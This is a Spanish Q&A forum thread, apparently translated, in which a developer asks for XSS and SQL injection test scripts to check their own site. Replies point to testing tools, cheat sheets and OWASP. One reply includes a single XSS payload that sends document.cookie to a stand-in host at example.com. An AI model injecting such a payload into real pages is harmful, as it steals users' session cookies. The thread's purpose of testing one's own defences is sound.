2010-05-08 7 views
10

Estoy probando mis scripts para ver si evitarán las inyecciones xss y sql. ¿Alguien puede proporcionarme algunos scripts básicos pero buenos que "piratearán" mis programas? Quiero probar mis scripts antes de que se conecten.¿Puede alguien darme algunos scripts básicos de inyección de XSS y sql? (No es lo que parece)

EDIT: Gracias a todos por esos enlaces, que contienen montones y montones de información. Pero para un principiante de la seguridad, ¿hay un sitio recomendado que es? No estoy seguro si estoy listo para sumergirme directamente en los problemas de seguridad en el departamento. Me gustan los enlaces recomendados waiwai933.

Respuesta

5

Cada situación requiere secuencias de comandos diferentes, por lo que no hay "una talla para todos" que cualquiera pueda ofrecer. La lista de scripts que necesitaría probarse llega a miles antes de que pueda estar seguro de que su sitio es seguro.

Es posible que desee comprobar los complementos de Firefox o Chrome que le permiten probar las inyecciones de SQL. Sugiero este, pero es posible que desee buscar otros también: https://addons.mozilla.org/en-US/firefox/addon/6727. Lo que hace es que le permite proporcionar una lista de scripts de inyección, que probablemente proporciona algunos de forma predeterminada, y luego, una vez que la activa, bombardea su sitio con estos scripts y le permite ver dónde están las vulnerabilidades.

que sugieren este sitio para algunos scripts de ejemplo de XSS: http://ha.ckers.org/xss.html

+0

gracias! ¿Puedes describir brevemente qué hace el complemento? – ggfan

+0

vaya al sitio y lea la descripción? – Galen

+0

+1 para el último enlace – chelmertz

1

El más sencillo, que no consigue bloqueado por los navegadores y puede ocurrir fácilmente si no strip_tags() es el siguiente código:

<script>(new Image).src = 'http://example.com/logSessions.php?s=' + document.cookie;</script> 
+0

Para el registro, 'nasty.com' es un sitio pornográfico extranjero. Sólo digo'. – mattbasta

1

El nuevo sitio de enseñanza de Googe jarslberg es un excelente recurso para enseñarle cómo escribir y defenderse contra XSS y otros ataques de seguridad.

1

+1 para cuidar y saber lo suficiente como para preguntar. Ya que está haciendo preguntas de seguridad, me gustaría recomendar el sitio web OWASP si aún no está familiarizado. Encontrará todo tipo de información además de lo que ha pedido. Sin mencionar toneladas de información sobre la prevención de todo tipo de ataques. El sitio es una herramienta invaluable para los desarrolladores web.

+0

¡gracias! Mirar en el sitio – ggfan

2

La hoja de prueba XSS en http://ha.ckers.org/xss.html es una buena colección de pruebas XSS. Sin embargo, no recomendaría implementar su propio comprobador XSS; es mucho más difícil que detectar inyecciones de SQL (como probablemente te darás cuenta al ver algunos de los ejemplos en la hoja de trucos). El único método sólido es analizar el código, crear un árbol DOM a partir de él y transformar ese árbol en HTML, y eso es mucho trabajo, y otras personas ya lo han hecho. Use algo como HTML Purifier.

0

Puede probar con Acunetix Security Scanner, no explorará solo la inyección XSS y MySQL por defecto, sino incluso para otros tipos de exploits. El programa prácticamente emula un navegador y puede comportarse como un usuario conectado.

Cuestiones relacionadas